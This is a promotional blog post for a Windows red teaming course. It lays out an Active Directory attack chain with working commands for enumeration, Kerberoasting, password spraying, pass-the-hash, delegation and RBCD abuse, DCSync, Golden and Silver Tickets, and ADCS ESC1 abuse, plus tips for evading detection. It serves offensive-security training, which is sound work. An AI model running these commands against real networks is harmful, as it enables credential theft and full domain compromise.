Active Directory is the backbone of nearly every enterprise Windows environment on the planet. It is also one of the most consistently abused attack surfaces in modern red team operations. If you are preparing for an internal red team role, an adversary simulation engagement, or a career pivot into offensive security, understanding how to enumerate, exploit, and persist within AD environments is non-negotiable.
This post walks through the core technical areas covered in the Redfox Cybersecurity Academy Windows Red Teaming Course, including real commands, practical tooling, and the kind of attack chains that mirror what elite operators actually execute in the field.
AD manages authentication, authorization, and access across thousands of machines in a single domain. Attackers target it because a single misconfiguration, a weak delegation setting, or a reused password can cascade into full domain compromise. The challenge is not just knowing that these weaknesses exist, it is knowing how to chain them together under real engagement conditions.
The Redfox Cybersecurity Academy course is built around exactly that kind of adversarial thinking, combining structured lab exercises with the tooling professionals use on live engagements.
Before diving into attack techniques, you need a realistic lab. A minimal Active Directory lab for practicing red team techniques should include at minimum one domain controller running Windows Server 2019 or 2022, two workstations joined to the domain, and a Kali Linux or Windows attack machine.
Professional-grade tools used throughout these labs include:
Enumeration is the foundation of every successful AD attack. Rushing past this phase is the most common mistake junior operators make.
If you land on a machine inside the network with no credentials, LDAP null sessions or anonymous binds can still yield useful data depending on the domain configuration.
ldapsearch -x -H ldap://192.168.1.10 -b "DC=corp,DC=local" "(objectClass=user)" sAMAccountName
[cta]
Once you have domain credentials, SharpHound gives you a complete attack path graph.
.\SharpHound.exe -c All --zipfilename bloodhound_output.zip --domain corp.local
[cta]
Import the ZIP into BloodHound and immediately run the pre-built query "Shortest Paths to Domain Admins." This single query has ended countless engagements in under an hour for experienced operators.
# Find all users with SPN set (Kerberoastable accounts)
Get-DomainUser -SPN | Select SamAccountName, ServicePrincipalName, Description
# Find computers where Domain Admins are logged in
Find-DomainUserLocation -UserGroupIdentity "Domain Admins"
# Enumerate ACLs for a target user
Get-DomainObjectAcl -Identity "jsmith" -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner" }
[cta]
ACL abuse is one of the most underestimated attack vectors in AD environments. The ability to read and exploit object-level permissions separates intermediate practitioners from advanced operators. This is covered in depth in the Windows Red Teaming Course at Redfox Cybersecurity Academy.
Kerberoasting targets service accounts with Service Principal Names (SPNs). Any authenticated domain user can request a TGS ticket for any SPN, and that ticket is encrypted with the service account's NTLM hash. Offline cracking follows.
# Using Impacket from Linux
python3 GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 192.168.1.10 -outputfile kerberoast_hashes.txt
# Crack with Hashcat
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
[cta]
Accounts with Kerberos pre-authentication disabled expose their AS-REP hash to any unauthenticated attacker.
python3 GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt -dc-ip 192.168.1.10
# Crack with Hashcat (mode 18200)
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
[cta]
Spraying requires discipline. One password per account, with attention to the domain's lockout threshold (typically three to five attempts). Use NetExec to control this precisely.
netexec smb 192.168.1.0/24 -u users.txt -p 'Winter2024!' --continue-on-success
[cta]
If you have extracted an NTLM hash from a compromised machine, you can authenticate to other systems without knowing the plaintext password.
python3 psexec.py -hashes :a87f3a337d73085c45f9416be5787d86 corp.local/administrator@192.168.1.20
[cta]
With Rubeus, you can inject a Kerberos TGT or TGS directly into your current logon session.
# Export existing tickets
.\Rubeus.exe dump /nowrap
# Import a ticket into the current session
.\Rubeus.exe ptt /ticket:<base64_ticket_here>
# Verify
klist
[cta]
This technique is particularly effective when you have obtained a TGT for a high-value account and want to pivot without touching disk or spawning additional processes in a noisy way.
python3 wmiexec.py corp.local/jsmith:Password123@192.168.1.20
[cta]
WMI is a native Windows management channel and often bypasses endpoint detection where PSExec would fire an alert. Familiarity with multiple lateral movement channels is essential for realistic engagements. The Redfox Cybersecurity Academy Windows Red Teaming Course dedicates full lab modules to choosing the right movement technique based on the environment's defenses.
Any computer with unconstrained delegation enabled will cache TGTs of every user who authenticates to it. If you compromise that computer, you can extract those tickets and impersonate high-value users, including Domain Admins.
# Find computers with unconstrained delegation
Get-DomainComputer -Unconstrained | Select DNSHostName, UserAccountControl
# On the compromised server, extract TGTs with Rubeus
.\Rubeus.exe monitor /interval:5 /nowrap
[cta]
The Printer Bug (SpoolSample) or PetitPotam can coerce authentication from the domain controller to your unconstrained delegation host, capturing the DC's TGT. With that ticket, DCSync becomes trivial.
# Coerce DC authentication using PetitPotam
python3 PetitPotam.py -u jsmith -p Password123 192.168.1.50 192.168.1.10
[cta]
Constrained delegation allows a service account to impersonate any user to a specific set of services. If the service account's credentials are compromised, S4U2Self and S4U2Proxy can be abused to generate tickets as any domain user to those services.
.\Rubeus.exe s4u /user:svcIIS /rc4:a87f3a337d73085c45f9416be5787d86 /impersonateuser:Administrator /msdsspn:"cifs/fileserver.corp.local" /nowrap
[cta]
Once you have a user account with replication rights (or you have obtained Domain Admin), DCSync lets you pull NTLM hashes for any account in the domain, including krbtgt, without ever touching the domain controller's disk.
python3 secretsdump.py corp.local/administrator:Password123@192.168.1.10 -just-dc-ntlm
# Or target a specific user
python3 secretsdump.py corp.local/administrator:Password123@192.168.1.10 -just-dc-user krbtgt
[cta]
With the krbtgt hash in hand, you can forge TGTs for any user in the domain. This is persistence, not just escalation: even after a password reset, forged tickets remain valid until the krbtgt account password is reset twice.
# Using Mimikatz
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXXXXXXXXX /krbtgt:a87f3a337d73085c45f9416be5787d86 /user:FakeAdmin /ptt
[cta]
A Silver Ticket targets a specific service rather than the entire domain. Because it is signed with the service account's hash rather than krbtgt, it does not touch the domain controller during use and is significantly harder to detect.
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXXXXXXXXX /target:fileserver.corp.local /service:cifs /rc4:SERVICE_ACCOUNT_HASH /user:Administrator /ptt
[cta]
RBAC abuse is one of the more sophisticated techniques in the modern AD attacker's toolkit. If you have write access to a computer object's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, you can configure yourself as a trusted principal and then impersonate any user to that machine, including Domain Admins.
# Create a fake computer account
.\StandIn.exe --computer FakePC --make
# Set RBCD on the target machine
Set-DomainRBCD -Identity WS01 -DelegateFrom FakePC
# Use Rubeus to perform the full S4U chain
.\Rubeus.exe s4u /user:FakePC$ /rc4:<FakePC_NTLM_Hash> /impersonateuser:Administrator /msdsspn:"cifs/WS01.corp.local" /nowrap
[cta]
This technique requires no elevated privileges on the target, only a write permission on a computer object, which BloodHound will surface if it exists in your target environment. This is precisely the kind of low-noise, high-impact path that advanced red teamers look for, and it is built into the lab curriculum at Redfox Cybersecurity Academy.
Active Directory Certificate Services has become one of the hottest attack surfaces in AD environments since the SpecterOps research popularized it. ESC1 targets certificate templates that allow requesters to specify a Subject Alternative Name (SAN), meaning any authenticated user can request a certificate that authenticates as a Domain Admin.
# Enumerate vulnerable templates with Certipy
certipy find -u jsmith@corp.local -p Password123 -dc-ip 192.168.1.10 -vulnerable
# Request a certificate as a Domain Admin via ESC1
certipy req -u jsmith@corp.local -p Password123 -ca corp-CA -template VulnerableTemplate -upn administrator@corp.local -dc-ip 192.168.1.10
# Authenticate using the certificate and retrieve the NTLM hash
certipy auth -pfx administrator.pfx -dc-ip 192.168.1.10
[cta]
ADCS attacks are covered extensively in the course because they represent a class of misconfiguration that persists undetected in a significant number of enterprise environments.
Red teamers who understand how defenders detect their techniques are far more effective than those who simply run tooling. Every lab in the course is paired with awareness of the detection layer, covering Windows Event IDs, SIEM signatures, and EDR behavioral patterns.
Key detection events to understand as an attacker:
Understanding these signatures allows you to modify tool behavior, such as requesting AES tickets instead of RC4, adjusting timing between requests, or operating through legitimate management channels to blend in.
The Windows Red Teaming Course is structured around a pre-built, realistic lab environment so you spend your time attacking rather than debugging infrastructure. The lab covers:
The curriculum is designed for practitioners who already have a baseline understanding of Windows and networking. If you are transitioning from network penetration testing into Windows-focused red teaming, or if you want to add depth to an existing offensive security skillset, this is the course structure that matches your goals.
Active Directory attack techniques are not theoretical constructs. They are the daily working methods of red teams operating against Fortune 500 companies, government agencies, and critical infrastructure operators. Enumeration through BloodHound, credential abuse via Kerberoasting and AS-REP roasting, lateral movement using Pass-the-Hash and WMI, escalation via delegation abuse, and persistence through Golden Tickets and ADCS certificates represent a complete, realistic attack chain that you need to be able to execute fluidly.
The difference between knowing these techniques and being proficient with them under real engagement pressure comes down entirely to lab time. Every technique outlined in this post maps directly to a hands-on module in the Redfox Cybersecurity Academy Windows Red Teaming Course.
If you are serious about building a career in offensive security or advancing your current red team capabilities, structured hands-on lab training is the fastest path from understanding to execution. Redfox Cybersecurity Academy has built the course specifically for practitioners who want to operate at a professional level against real Active Directory environments.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
